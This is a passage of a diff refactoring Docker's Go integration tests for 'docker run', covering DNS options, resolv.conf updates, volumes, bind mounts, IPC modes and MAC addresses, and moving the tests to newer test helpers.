 		dockerCmd(c, "run", "-v", "/:/host", "busybox", "ls", "/host")
 	}
@@ -1252,7 +1239,7 @@ func (s *DockerSuite) TestRunAllowBindMountingRoot(c *check.C) {
 func (s *DockerSuite) TestRunDisallowBindMountingRootToRoot(c *check.C) {
 	mount := "/:/"
 	targetDir := "/host"
-	if daemonPlatform == "windows" {
+	if testEnv.OSType == "windows" {
 		mount = `c:\:c\`
 		targetDir = "c:/host" // Forward slash as using busybox
 	}
@@ -1301,29 +1288,29 @@ func (s *DockerSuite) TestRunDNSOptions(c *check.C) {
 	// Not applicable on Windows as Windows does not support --dns*, or
 	// the Unix-specific functionality of resolv.conf.
 	testRequires(c, DaemonIsLinux)
-	out, stderr, _ := dockerCmdWithStdoutStderr(c, "run", "--dns=127.0.0.1", "--dns-search=mydomain", "--dns-opt=ndots:9", "busybox", "cat", "/etc/resolv.conf")
+	result := cli.DockerCmd(c, "run", "--dns=127.0.0.1", "--dns-search=mydomain", "--dns-opt=ndots:9", "busybox", "cat", "/etc/resolv.conf")
 
 	// The client will get a warning on stderr when setting DNS to a localhost address; verify this:
-	if !strings.Contains(stderr, "Localhost DNS setting") {
-		c.Fatalf("Expected warning on stderr about localhost resolver, but got %q", stderr)
+	if !strings.Contains(result.Stderr(), "Localhost DNS setting") {
+		c.Fatalf("Expected warning on stderr about localhost resolver, but got %q", result.Stderr())
 	}
 
-	actual := strings.Replace(strings.Trim(out, "\r\n"), "\n", " ", -1)
+	actual := strings.Replace(strings.Trim(result.Stdout(), "\r\n"), "\n", " ", -1)
 	if actual != "search mydomain nameserver 127.0.0.1 options ndots:9" {
 		c.Fatalf("expected 'search mydomain nameserver 127.0.0.1 options ndots:9', but says: %q", actual)
 	}
 
-	out, stderr, _ = dockerCmdWithStdoutStderr(c, "run", "--dns=127.0.0.1", "--dns-search=.", "--dns-opt=ndots:3", "busybox", "cat", "/etc/resolv.conf")
+	out := cli.DockerCmd(c, "run", "--dns=1.1.1.1", "--dns-search=.", "--dns-opt=ndots:3", "busybox", "cat", "/etc/resolv.conf").Combined()
 
 	actual = strings.Replace(strings.Trim(strings.Trim(out, "\r\n"), " "), "\n", " ", -1)
-	if actual != "nameserver 127.0.0.1 options ndots:3" {
-		c.Fatalf("expected 'nameserver 127.0.0.1 options ndots:3', but says: %q", actual)
+	if actual != "nameserver 1.1.1.1 options ndots:3" {
+		c.Fatalf("expected 'nameserver 1.1.1.1 options ndots:3', but says: %q", actual)
 	}
 }
 
 func (s *DockerSuite) TestRunDNSRepeatOptions(c *check.C) {
 	testRequires(c, DaemonIsLinux)
-	out, _, _ := dockerCmdWithStdoutStderr(c, "run", "--dns=1.1.1.1", "--dns=2.2.2.2", "--dns-search=mydomain", "--dns-search=mydomain2", "--dns-opt=ndots:9", "--dns-opt=timeout:3", "busybox", "cat", "/etc/resolv.conf")
+	out := cli.DockerCmd(c, "run", "--dns=1.1.1.1", "--dns=2.2.2.2", "--dns-search=mydomain", "--dns-search=mydomain2", "--dns-opt=ndots:9", "--dns-opt=timeout:3", "busybox", "cat", "/etc/resolv.conf").Stdout()
 
 	actual := strings.Replace(strings.Trim(out, "\r\n"), "\n", " ", -1)
 	if actual != "search mydomain mydomain2 nameserver 1.1.1.1 nameserver 2.2.2.2 options ndots:9 timeout:3" {
@@ -1393,7 +1380,6 @@ func (s *DockerSuite) TestRunDNSOptionsBasedOnHostResolvConf(c *check.C) {
 		c.Fatalf("/etc/resolv.conf does not exist")
 	}
 
-	hostNameservers = resolvconf.GetNameservers(resolvConf, types.IP)
 	hostSearch = resolvconf.GetSearchDomains(resolvConf)
 
 	out, _ = dockerCmd(c, "run", "busybox", "cat", "/etc/resolv.conf")
@@ -1420,10 +1406,7 @@ func (s *DockerSuite) TestRunNonRootUserResolvName(c *check.C) {
 
 	dockerCmd(c, "run", "--name=testperm", "--user=nobody", "busybox", "nslookup", "apt.dockerproject.org")
 
-	cID, err := getIDByName("testperm")
-	if err != nil {
-		c.Fatal(err)
-	}
+	cID := getIDByName(c, "testperm")
 
 	fmode := (os.FileMode)(0644)
 	finfo, err := os.Stat(containerStorageFile(cID, "resolv.conf"))
@@ -1461,10 +1444,7 @@ func (s *DockerSuite) TestRunResolvconfUpdate(c *check.C) {
 		c.Fatal(err)
 	}
 	if mounted {
-		cmd := exec.Command("umount", "/etc/resolv.conf")
-		if _, err = runCommand(cmd); err != nil {
-			c.Fatal(err)
-		}
+		icmd.RunCommand("umount", "/etc/resolv.conf").Assert(c, icmd.Success)
 	}
 
 	//cleanup
@@ -1476,10 +1456,7 @@ func (s *DockerSuite) TestRunResolvconfUpdate(c *check.C) {
 
 	//1. test that a restarting container gets an updated resolv.conf
 	dockerCmd(c, "run", "--name=first", "busybox", "true")
-	containerID1, err := getIDByName("first")
-	if err != nil {
-		c.Fatal(err)
-	}
+	containerID1 := getIDByName(c, "first")
 
 	// replace resolv.conf with our temporary copy
 	bytesResolvConf := []byte(tmpResolvConf)
@@ -1491,10 +1468,7 @@ func (s *DockerSuite) TestRunResolvconfUpdate(c *check.C) {
 	dockerCmd(c, "start", "first")
 
 	// check for update in container
-	containerResolv, err := readContainerFile(containerID1, "resolv.conf")
-	if err != nil {
-		c.Fatal(err)
-	}
+	containerResolv := readContainerFile(c, containerID1, "resolv.conf")
 	if !bytes.Equal(containerResolv, bytesResolvConf) {
 		c.Fatalf("Restarted container does not have updated resolv.conf; expected %q, got %q", tmpResolvConf, string(containerResolv))
 	}
@@ -1506,10 +1480,7 @@ func (s *DockerSuite) TestRunResolvconfUpdate(c *check.C) {
 	//2. test that a restarting container does not receive resolv.conf updates
 	//   if it modified the container copy of the starting point resolv.conf
 	dockerCmd(c, "run", "--name=second", "busybox", "sh", "-c", "echo 'search mylittlepony.com' >>/etc/resolv.conf")
-	containerID2, err := getIDByName("second")
-	if err != nil {
-		c.Fatal(err)
-	}
+	containerID2 := getIDByName(c, "second")
 
 	//make a change to resolv.conf (in this case replacing our tmp copy with orig copy)
 	if err := ioutil.WriteFile("/etc/resolv.conf", resolvConfSystem, 0644); err != nil {
@@ -1520,11 +1491,7 @@ func (s *DockerSuite) TestRunResolvconfUpdate(c *check.C) {
 	dockerCmd(c, "start", "second")
 
 	// check for update in container
-	containerResolv, err = readContainerFile(containerID2, "resolv.conf")
-	if err != nil {
-		c.Fatal(err)
-	}
-
+	containerResolv = readContainerFile(c, containerID2, "resolv.conf")
 	if bytes.Equal(containerResolv, resolvConfSystem) {
 		c.Fatalf("Container's resolv.conf should not have been updated with host resolv.conf: %q", string(containerResolv))
 	}
@@ -1539,11 +1506,7 @@ func (s *DockerSuite) TestRunResolvconfUpdate(c *check.C) {
 	}
 
 	// check for update in container
-	containerResolv, err = readContainerFile(runningContainerID, "resolv.conf")
-	if err != nil {
-		c.Fatal(err)
-	}
-
+	containerResolv = readContainerFile(c, runningContainerID, "resolv.conf")
 	if bytes.Equal(containerResolv, bytesResolvConf) {
 		c.Fatalf("Running container should not have updated resolv.conf; expected %q, got %q", string(resolvConfSystem), string(containerResolv))
 	}
@@ -1553,10 +1516,7 @@ func (s *DockerSuite) TestRunResolvconfUpdate(c *check.C) {
 	dockerCmd(c, "restart", runningContainerID)
 
 	// check for update in container
-	containerResolv, err = readContainerFile(runningContainerID, "resolv.conf")
-	if err != nil {
-		c.Fatal(err)
-	}
+	containerResolv = readContainerFile(c, runningContainerID, "resolv.conf")
 	if !bytes.Equal(containerResolv, bytesResolvConf) {
 		c.Fatalf("Restarted container should have updated resolv.conf; expected %q, got %q", string(bytesResolvConf), string(containerResolv))
 	}
@@ -1575,11 +1535,7 @@ func (s *DockerSuite) TestRunResolvconfUpdate(c *check.C) {
 
 	// our first exited container ID should have been updated, but with default DNS
 	// after the cleanup of resolv.conf found only a localhost nameserver:
-	containerResolv, err = readContainerFile(containerID1, "resolv.conf")
-	if err != nil {
-		c.Fatal(err)
-	}
-
+	containerResolv = readContainerFile(c, containerID1, "resolv.conf")
 	expected := "\nnameserver 8.8.8.8\nnameserver 8.8.4.4\n"
 	if !bytes.Equal(containerResolv, []byte(expected)) {
 		c.Fatalf("Container does not have cleaned/replaced DNS in resolv.conf; expected %q, got %q", expected, string(containerResolv))
@@ -1595,10 +1551,7 @@ func (s *DockerSuite) TestRunResolvconfUpdate(c *check.C) {
 
 	// Run the container so it picks up the old settings
 	dockerCmd(c, "run", "--name=third", "busybox", "true")
-	containerID3, err := getIDByName("third")
-	if err != nil {
-		c.Fatal(err)
-	}
+	containerID3 := getIDByName(c, "third")
 
 	// Create a modified resolv.conf.aside and override resolv.conf with it
 	bytesResolvConf = []byte(tmpResolvConf)
@@ -1615,10 +1568,7 @@ func (s *DockerSuite) TestRunResolvconfUpdate(c *check.C) {
 	dockerCmd(c, "start", "third")
 
 	// check for update in container
-	containerResolv, err = readContainerFile(containerID3, "resolv.conf")
-	if err != nil {
-		c.Fatal(err)
-	}
+	containerResolv = readContainerFile(c, containerID3, "resolv.conf")
 	if !bytes.Equal(containerResolv, bytesResolvConf) {
 		c.Fatalf("Stopped container does not have updated resolv.conf; expected\n%q\n got\n%q", tmpResolvConf, string(containerResolv))
 	}
@@ -1664,13 +1614,11 @@ func (s *DockerSuite) TestRunAttachStdOutAndErrTTYMode(c *check.C) {
 // Test for #10388 - this will run the same test as TestRunAttachStdOutAndErrTTYMode
 // but using --attach instead of -a to make sure we read the flag correctly
 func (s *DockerSuite) TestRunAttachWithDetach(c *check.C) {
-	cmd := exec.Command(dockerBinary, "run", "-d", "--attach", "stdout", "busybox", "true")
-	_, stderr, _, err := runCommandWithStdoutStderr(cmd)
-	if err == nil {
-		c.Fatal("Container should have exited with error code different than 0")
-	} else if !strings.Contains(stderr, "Conflicting options: -a and -d") {
-		c.Fatal("Should have been returned an error with conflicting options -a and -d")
-	}
+	icmd.RunCommand(dockerBinary, "run", "-d", "--attach", "stdout", "busybox", "true").Assert(c, icmd.Expected{
+		ExitCode: 1,
+		Error:    "exit status 1",
+		Err:      "Conflicting options: -a and -d",
+	})
 }
 
 func (s *DockerSuite) TestRunState(c *check.C) {
@@ -1714,15 +1662,10 @@ func (s *DockerSuite) TestRunCopyVolumeUIDGID(c *check.C) {
 	// Not applicable on Windows as it does not support uid or gid in this way
 	testRequires(c, DaemonIsLinux)
 	name := "testrunvolumesuidgid"
-	_, err := buildImage(name,
-		`FROM busybox
+	buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox
 		RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd
 		RUN echo 'dockerio:x:1001:' >> /etc/group
-		RUN mkdir -p /hello && touch /hello/test && chown dockerio.dockerio /hello`,
-		true)
-	if err != nil {
-		c.Fatal(err)
-	}
+		RUN mkdir -p /hello && touch /hello/test && chown dockerio.dockerio /hello`))
 
 	// Test that the uid and gid is copied from the image to the volume
 	out, _ := dockerCmd(c, "run", "--rm", "-v", "/hello", name, "sh", "-c", "ls -l / | grep hello | awk '{print $3\":\"$4}'")
@@ -1734,17 +1677,12 @@ func (s *DockerSuite) TestRunCopyVolumeUIDGID(c *check.C) {
 
 // Test for #1582
 func (s *DockerSuite) TestRunCopyVolumeContent(c *check.C) {
-	// TODO Windows, post TP5. Windows does not yet support volume functionality
+	// TODO Windows, post RS1. Windows does not yet support volume functionality
 	// that copies from the image to the volume.
 	testRequires(c, DaemonIsLinux)
 	name := "testruncopyvolumecontent"
-	_, err := buildImage(name,
-		`FROM busybox
-		RUN mkdir -p /hello/local && echo hello > /hello/local/world`,
-		true)
-	if err != nil {
-		c.Fatal(err)
-	}
+	buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox
+		RUN mkdir -p /hello/local && echo hello > /hello/local/world`))
 
 	// Test that the content is copied from the image to the volume
 	out, _ := dockerCmd(c, "run", "--rm", "-v", "/hello", name, "find", "/hello")
@@ -1755,13 +1693,9 @@ func (s *DockerSuite) TestRunCopyVolumeContent(c *check.C) {
 
 func (s *DockerSuite) TestRunCleanupCmdOnEntrypoint(c *check.C) {
 	name := "testrunmdcleanuponentrypoint"
-	if _, err := buildImage(name,
-		`FROM busybox
+	buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox
 		ENTRYPOINT ["echo"]
-		CMD ["testingpoint"]`,
-		true); err != nil {
-		c.Fatal(err)
-	}
+		CMD ["testingpoint"]`))
 
 	out, exit := dockerCmd(c, "run", "--entrypoint", "whoami", name)
 	if exit != 0 {
@@ -1769,15 +1703,15 @@ func (s *DockerSuite) TestRunCleanupCmdOnEntrypoint(c *check.C) {
 	}
 	out = strings.TrimSpace(out)
 	expected := "root"
-	if daemonPlatform == "windows" {
-		if strings.Contains(WindowsBaseImage, "windowsservercore") {
+	if testEnv.OSType == "windows" {
+		if strings.Contains(testEnv.PlatformDefaults.BaseImage, "windowsservercore") {
 			expected = `user manager\containeradministrator`
 		} else {
 			expected = `ContainerAdministrator` // nanoserver
 		}
 	}
 	if out != expected {
-		c.Fatalf("Expected output %s, got %q. %s", expected, out, WindowsBaseImage)
+		c.Fatalf("Expected output %s, got %q. %s", expected, out, testEnv.PlatformDefaults.BaseImage)
 	}
 }
 
@@ -1785,7 +1719,7 @@ func (s *DockerSuite) TestRunCleanupCmdOnEntrypoint(c *check.C) {
 func (s *DockerSuite) TestRunWorkdirExistsAndIsFile(c *check.C) {
 	existingFile := "/bin/cat"
 	expected := "not a directory"
-	if daemonPlatform == "windows" {
+	if testEnv.OSType == "windows" {
 		existingFile = `\windows\system32\ntdll.dll`
 		expected = `The directory name is invalid.`
 	}
@@ -1801,7 +1735,7 @@ func (s *DockerSuite) TestRunExitOnStdinClose(c *check.C) {
 
 	meow := "/bin/cat"
 	delay := 60
-	if daemonPlatform == "windows" {
+	if testEnv.OSType == "windows" {
 		meow = "cat"
 	}
 	runCmd := exec.Command(dockerBinary, "run", "--name", name, "-i", "busybox", meow)
@@ -1866,17 +1800,24 @@ func (s *DockerSuite) TestRunInteractiveWithRestartPolicy(c *check.C) {
 	}()
 
 	result = icmd.WaitOnCmd(60*time.Second, result)
-	c.Assert(result, icmd.Matches, icmd.Expected{ExitCode: 11})
+	result.Assert(c, icmd.Expected{ExitCode: 11})
 }
 
 // Test for #2267
-func (s *DockerSuite) TestRunWriteHostsFileAndNotCommit(c *check.C) {
-	// Cannot run on Windows as Windows does not support diff.
+func (s *DockerSuite) TestRunWriteSpecialFilesAndNotCommit(c *check.C) {
+	// Cannot run on Windows as this files are not present in Windows
 	testRequires(c, DaemonIsLinux)
-	name := "writehosts"
-	out, _ := dockerCmd(c, "run", "--name", name, "busybox", "sh", "-c", "echo test2267 >> /etc/hosts && cat /etc/hosts")
+
+	testRunWriteSpecialFilesAndNotCommit(c, "writehosts", "/etc/hosts")
+	testRunWriteSpecialFilesAndNotCommit(c, "writehostname", "/etc/hostname")
+	testRunWriteSpecialFilesAndNotCommit(c, "writeresolv", "/etc/resolv.conf")
+}
+
+func testRunWriteSpecialFilesAndNotCommit(c *check.C, name, path string) {
+	command := fmt.Sprintf("echo test2267 >> %s && cat %s", path, path)
+	out, _ := dockerCmd(c, "run", "--name", name, "busybox", "sh", "-c", command)
 	if !strings.Contains(out, "test2267") {
-		c.Fatal("/etc/hosts should contain 'test2267'")
+		c.Fatalf("%s should contain 'test2267'", path)
 	}
 
 	out, _ = dockerCmd(c, "diff", name)
@@ -1886,11 +1827,9 @@ func (s *DockerSuite) TestRunWriteHostsFileAndNotCommit(c *check.C) {
 }
 
 func eqToBaseDiff(out string, c *check.C) bool {
-	name := "eqToBaseDiff" + stringutils.GenerateRandomAlphaOnlyString(32)
+	name := "eqToBaseDiff" + testutil.GenerateRandomAlphaOnlyString(32)
 	dockerCmd(c, "run", "--name", name, "busybox", "echo", "hello")
-	cID, err := getIDByName(name)
-	c.Assert(err, check.IsNil)
-
+	cID := getIDByName(c, name)
 	baseDiff, _ := dockerCmd(c, "diff", cID)
 	baseArr := strings.Split(baseDiff, "\n")
 	sort.Strings(baseArr)
@@ -1913,38 +1852,6 @@ func sliceEq(a, b []string) bool {
 	return true
 }
 
-// Test for #2267
-func (s *DockerSuite) TestRunWriteHostnameFileAndNotCommit(c *check.C) {
-	// Cannot run on Windows as Windows does not support diff.
-	testRequires(c, DaemonIsLinux)
-	name := "writehostname"
-	out, _ := dockerCmd(c, "run", "--name", name, "busybox", "sh", "-c", "echo test2267 >> /etc/hostname && cat /etc/hostname")
-	if !strings.Contains(out, "test2267") {
-		c.Fatal("/etc/hostname should contain 'test2267'")
-	}
-
-	out, _ = dockerCmd(c, "diff", name)
-	if len(strings.Trim(out, "\r\n")) != 0 && !eqToBaseDiff(out, c) {
-		c.Fatal("diff should be empty")
-	}
-}
-
-// Test for #2267
-func (s *DockerSuite) TestRunWriteResolvFileAndNotCommit(c *check.C) {
-	// Cannot run on Windows as Windows does not support diff.
-	testRequires(c, DaemonIsLinux)
-	name := "writeresolv"
-	out, _ := dockerCmd(c, "run", "--name", name, "busybox", "sh", "-c", "echo test2267 >> /etc/resolv.conf && cat /etc/resolv.conf")
-	if !strings.Contains(out, "test2267") {
-		c.Fatal("/etc/resolv.conf should contain 'test2267'")
-	}
-
-	out, _ = dockerCmd(c, "diff", name)
-	if len(strings.Trim(out, "\r\n")) != 0 && !eqToBaseDiff(out, c) {
-		c.Fatal("diff should be empty")
-	}
-}
-
 func (s *DockerSuite) TestRunWithBadDevice(c *check.C) {
 	// Cannot run on Windows as Windows does not support --device
 	testRequires(c, DaemonIsLinux)
@@ -1973,7 +1880,7 @@ func (s *DockerSuite) TestRunEntrypoint(c *check.C) {
 
 func (s *DockerSuite) TestRunBindMounts(c *check.C) {
 	testRequires(c, SameHostDaemon)
-	if daemonPlatform == "linux" {
+	if testEnv.OSType == "linux" {
 		testRequires(c, DaemonIsLinux, NotUserNamespace)
 	}
 
@@ -1987,17 +1894,14 @@ func (s *DockerSuite) TestRunBindMounts(c *check.C) {
 	defer os.RemoveAll(tmpDir)
 	writeFile(path.Join(tmpDir, "touch-me"), "", c)
 
-	// TODO Windows: Temporary check - remove once TP5 support is dropped
-	if daemonPlatform != "windows" || windowsDaemonKV >= 14350 {
-		// Test reading from a read-only bind mount
-		out, _ := dockerCmd(c, "run", "-v", fmt.Sprintf("%s:%s/tmp:ro", tmpDir, prefix), "busybox", "ls", prefix+"/tmp")
-		if !strings.Contains(out, "touch-me") {
-			c.Fatal("Container failed to read from bind mount")
-		}
+	// Test reading from a read-only bind mount
+	out, _ := dockerCmd(c, "run", "-v", fmt.Sprintf("%s:%s/tmp:ro", tmpDir, prefix), "busybox", "ls", prefix+"/tmp")
+	if !strings.Contains(out, "touch-me") {
+		c.Fatal("Container failed to read from bind mount")
 	}
 
 	// test writing to bind mount
-	if daemonPlatform == "windows" {
+	if testEnv.OSType == "windows" {
 		dockerCmd(c, "run", "-v", fmt.Sprintf(`%s:c:\tmp:rw`, tmpDir), "busybox", "touch", "c:/tmp/holla")
 	} else {
 		dockerCmd(c, "run", "-v", fmt.Sprintf("%s:/tmp:rw", tmpDir), "busybox", "touch", "/tmp/holla")
@@ -2012,7 +1916,7 @@ func (s *DockerSuite) TestRunBindMounts(c *check.C) {
 	}
 
 	// Windows does not (and likely never will) support mounting a single file
-	if daemonPlatform != "windows" {
+	if testEnv.OSType != "windows" {
 		// test mount a file
 		dockerCmd(c, "run", "-v", fmt.Sprintf("%s/holla:/tmp/holla:rw", tmpDir), "busybox", "sh", "-c", "echo -n 'yotta' > /tmp/holla")
 		content := readFile(path.Join(tmpDir, "holla"), c) // Will fail if the file doesn't exist
@@ -2037,9 +1941,9 @@ func (s *DockerSuite) TestRunCidFileCleanupIfEmpty(c *check.C) {
 	tmpCidFile := path.Join(tmpDir, "cid")
 
 	image := "emptyfs"
-	if daemonPlatform == "windows" {
+	if testEnv.OSType == "windows" {
 		// Windows can't support an emptyfs image. Just use the regular Windows image
-		image = WindowsBaseImage
+		image = testEnv.PlatformDefaults.BaseImage
 	}
 	out, _, err := dockerCmdWithError("run", "--cidfile", tmpCidFile, image)
 	if err == nil {
@@ -2083,7 +1987,7 @@ func (s *DockerSuite) TestRunCidFileCheckIDLength(c *check.C) {
 func (s *DockerSuite) TestRunSetMacAddress(c *check.C) {
 	mac := "12:34:56:78:9a:bc"
 	var out string
-	if daemonPlatform == "windows" {
+	if testEnv.OSType == "windows" {
 		out, _ = dockerCmd(c, "run", "-i", "--rm", fmt.Sprintf("--mac-address=%s", mac), "busybox", "sh", "-c", "ipconfig /all | grep 'Physical Address' | awk '{print $12}'")
 		mac = strings.Replace(strings.ToUpper(mac), ":", "-", -1) // To Windows-style MACs
 	} else {
@@ -2122,21 +2026,16 @@ func (s *DockerSuite) TestRunDeallocatePortOnMissingIptablesRule(c *check.C) {
 	// TODO Windows. Network settings are not propagated back to inspect.
 	testRequires(c, SameHostDaemon, DaemonIsLinux)
 
-	out, _ := dockerCmd(c, "run", "-d", "-p", "23:23", "busybox", "top")
+	out := cli.DockerCmd(c, "run", "-d", "-p", "23:23", "busybox", "top").Combined()
 
 	id := strings.TrimSpace(out)
 	ip := inspectField(c, id, "NetworkSettings.Networks.bridge.IPAddress")
-	iptCmd := exec.Command("iptables", "-D", "DOCKER", "-d", fmt.Sprintf("%s/32", ip),
-		"!", "-i", "docker0", "-o", "docker0", "-p", "tcp", "-m", "tcp", "--dport", "23", "-j", "ACCEPT")
-	out, _, err := runCommandWithOutput(iptCmd)
-	if err != nil {
-		c.Fatal(err, out)
-	}
-	if err := deleteContainer(id); err != nil {
-		c.Fatal(err)
-	}
+	icmd.RunCommand("iptables", "-D", "DOCKER", "-d", fmt.Sprintf("%s/32", ip),
+		"!", "-i", "docker0", "-o", "docker0", "-p", "tcp", "-m", "tcp", "--dport", "23", "-j", "ACCEPT").Assert(c, icmd.Success)
 
-	dockerCmd(c, "run", "-d", "-p", "23:23", "busybox", "top")
+	cli.DockerCmd(c, "rm", "-fv", id)
+
+	cli.DockerCmd(c, "run", "-d", "-p", "23:23", "busybox", "top")
 }
 
 func (s *DockerSuite) TestRunPortInUse(c *check.C) {
@@ -2180,7 +2079,7 @@ func (s *DockerSuite) TestRunAllocatePortInReservedRange(c *check.C) {
 
 // Regression test for #7792
 func (s *DockerSuite) TestRunMountOrdering(c *check.C) {
-	// TODO Windows: Post TP5. Updated, but Windows does not support nested mounts currently.
+	// TODO Windows: Post RS1. Windows does not support nested mounts.
 	testRequires(c, SameHostDaemon, DaemonIsLinux, NotUserNamespace)
 	prefix, _ := getPrefixAndSlashFromDaemonPlatform()
 
@@ -2276,23 +2175,18 @@ func (s *DockerSuite) TestVolumesNoCopyData(c *check.C) {
 	// are pre-populated such as is built in the dockerfile used in this test.
 	testRequires(c, DaemonIsLinux)
 	prefix, slash := getPrefixAndSlashFromDaemonPlatform()
-	if _, err := buildImage("dataimage",
-		`FROM busybox
+	buildImageSuccessfully(c, "dataimage", build.WithDockerfile(`FROM busybox
 		RUN ["mkdir", "-p", "/foo"]
-		RUN ["touch", "/foo/bar"]`,
-		true); err != nil {
-		c.Fatal(err)
-	}
-
+		RUN ["touch", "/foo/bar"]`))
 	dockerCmd(c, "run", "--name", "test", "-v", prefix+slash+"foo", "busybox")
 
 	if out, _, err := dockerCmdWithError("run", "--volumes-from", "test", "dataimage", "ls", "-lh", "/foo/bar"); err == nil || !strings.Contains(out, "No such file or directory") {
 		c.Fatalf("Data was copied on volumes-from but shouldn't be:\n%q", out)
 	}
 
-	tmpDir := randomTmpDirPath("docker_test_bind_mount_copy_data", daemonPlatform)
+	tmpDir := RandomTmpDirPath("docker_test_bind_mount_copy_data", testEnv.OSType)
 	if out, _, err := dockerCmdWithError("run", "-v", tmpDir+":/foo", "dataimage", "ls", "-lh", "/foo/bar"); err == nil || !strings.Contains(out, "No such file or directory") {
-		c.Fatalf("Data was copied on bind-mount but shouldn't be:\n%q", out)
+		c.Fatalf("Data was copied on bind mount but shouldn't be:\n%q", out)
 	}
 }
 
@@ -2312,13 +2206,8 @@ func (s *DockerSuite) TestRunNoOutputFromPullInStdout(c *check.C) {
 func (s *DockerSuite) TestRunVolumesCleanPaths(c *check.C) {
 	testRequires(c, SameHostDaemon)
 	prefix, slash := getPrefixAndSlashFromDaemonPlatform()
-	if _, err := buildImage("run_volumes_clean_paths",
-		`FROM busybox
-		VOLUME `+prefix+`/foo/`,
-		true); err != nil {
-		c.Fatal(err)
-	}
-
+	buildImageSuccessfully(c, "run_volumes_clean_paths", build.WithDockerfile(`FROM busybox
+		VOLUME `+prefix+`/foo/`))
 	dockerCmd(c, "run", "-v", prefix+"/foo", "-v", prefix+"/bar/", "--name", "dark_helmet", "run_volumes_clean_paths")
 
 	out, err := inspectMountSourceField("dark_helmet", prefix+slash+"foo"+slash)
@@ -2328,7 +2217,7 @@ func (s *DockerSuite) TestRunVolumesCleanPaths(c *check.C) {
 
 	out, err = inspectMountSourceField("dark_helmet", prefix+slash+`foo`)
 	c.Assert(err, check.IsNil)
-	if !strings.Contains(strings.ToLower(out), strings.ToLower(volumesConfigPath)) {
+	if !strings.Contains(strings.ToLower(out), strings.ToLower(testEnv.PlatformDefaults.VolumesConfigPath)) {
 		c.Fatalf("Volume was not defined for %s/foo\n%q", prefix, out)
 	}
 
@@ -2339,7 +2228,7 @@ func (s *DockerSuite) TestRunVolumesCleanPaths(c *check.C) {
 
 	out, err = inspectMountSourceField("dark_helmet", prefix+slash+"bar")
 	c.Assert(err, check.IsNil)
-	if !strings.Contains(strings.ToLower(out), strings.ToLower(volumesConfigPath)) {
+	if !strings.Contains(strings.ToLower(out), strings.ToLower(testEnv.PlatformDefaults.VolumesConfigPath)) {
 		c.Fatalf("Volume was not defined for %s/bar\n%q", prefix, out)
 	}
 }
@@ -2349,7 +2238,9 @@ func (s *DockerSuite) TestRunSlowStdoutConsumer(c *check.C) {
 	// TODO Windows: This should be able to run on Windows if can find an
 	// alternate to /dev/zero and /dev/stdout.
 	testRequires(c, DaemonIsLinux)
-	cont := exec.Command(dockerBinary, "run", "--rm", "busybox", "/bin/sh", "-c", "dd if=/dev/zero of=/dev/stdout bs=1024 count=2000 | catv")
+
+	args := []string{"run", "--rm", "busybox", "/bin/sh", "-c", "dd if=/dev/zero of=/dev/stdout bs=1024 count=2000 | cat -v"}
+	cont := exec.Command(dockerBinary, args...)
 
 	stdout, err := cont.StdoutPipe()
 	if err != nil {
@@ -2359,7 +2250,8 @@ func (s *DockerSuite) TestRunSlowStdoutConsumer(c *check.C) {
 	if err := cont.Start(); err != nil {
 		c.Fatal(err)
 	}
-	n, err := consumeWithSpeed(stdout, 10000, 5*time.Millisecond, nil)
+	defer func() { go cont.Wait() }()
+	n, err := ConsumeWithSpeed(stdout, 10000, 5*time.Millisecond, nil)
 	if err != nil {
 		c.Fatal(err)
 	}
@@ -2421,48 +2313,6 @@ func (s *DockerSuite) TestRunModeIpcHost(c *check.C) {
 	}
 }
 
-func (s *DockerSuite) TestRunModeIpcContainer(c *check.C) {
-	// Not applicable on Windows as uses Unix-specific capabilities
-	testRequires(c, SameHostDaemon, DaemonIsLinux)
-
-	out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", "echo -n test > /dev/shm/test && touch /dev/mqueue/toto && top")
-
-	id := strings.TrimSpace(out)
-	state := inspectField(c, id, "State.Running")
-	if state != "true" {
-		c.Fatal("Container state is 'not running'")
-	}
-	pid1 := inspectField(c, id, "State.Pid")
-
-	parentContainerIpc, err := os.Readlink(fmt.Sprintf("/proc/%s/ns/ipc", pid1))
-	if err != nil {
-		c.Fatal(err)
-	}
-
-	out, _ = dockerCmd(c, "run", fmt.Sprintf("--ipc=container:%s", id), "busybox", "readlink", "/proc/self/ns/ipc")
-	out = strings.Trim(out, "\n")
-	if parentContainerIpc != out {
-		c.Fatalf("IPC different with --ipc=container:%s %s != %s\n", id, parentContainerIpc, out)
-	}
-
-	catOutput, _ := dockerCmd(c, "run", fmt.Sprintf("--ipc=container:%s", id), "busybox", "cat", "/dev/shm/test")
-	if catOutput != "test" {
-		c.Fatalf("Output of /dev/shm/test expected test but found: %s", catOutput)
-	}
-
-	// check that /dev/mqueue is actually of mqueue type
-	grepOutput, _ := dockerCmd(c, "run", fmt.Sprintf("--ipc=container:%s", id), "busybox", "grep", "/dev/mqueue", "/proc/mounts")
-	if !strings.HasPrefix(grepOutput, "mqueue /dev/mqueue mqueue rw") {
-		c.Fatalf("Output of 'grep /proc/mounts' expected 'mqueue /dev/mqueue mqueue rw' but found: %s", grepOutput)
-	}
-
-	lsOutput, _ := dockerCmd(c, "run", fmt.Sprintf("--ipc=container:%s", id), "busybox", "ls", "/dev/mqueue")
-	lsOutput = strings.Trim(lsOutput, "\n")
-	if lsOutput != "toto" {
-		c.Fatalf("Output of 'ls /dev/mqueue' expected 'toto' but found: %s", lsOutput)
-	}
-}
-
 func (s *DockerSuite) TestRunModeIpcContainerNotExists(c *check.C) {
 	// Not applicable on Windows as uses Unix-specific capabilities
 	testRequires(c, DaemonIsLinux)
@@ -2709,10 +2559,10 @@ func (s *DockerSuite) TestRunNonLocalMacAddress(c *check.C) {
 	args := []string{"run", "--mac-address", addr}
 	expected := addr
 
-	if daemonPlatform != "windows" {
+	if testEnv.OSType != "windows" {
 		args = append(args, "busybox", "ifconfig")
 	} else {
-		args = append(args, WindowsBaseImage, "ipconfig", "/all")
+		args = append(args, testEnv.PlatformDefaults.BaseImage, "ipconfig", "/all")
 		expected = strings.Replace(strings.ToUpper(addr), ":", "-", -1)
 	}
 
@@ -2805,7 +2655,7 @@ func (s *DockerSuite) TestRunSetDefaultRestartPolicy(c *check.C) {
 func (s *DockerSuite) TestRunRestartMaxRetries(c *check.C) {
 	out, _ := dockerCmd(c, "run", "-d", "--restart=on-failure:3", "busybox", "false")
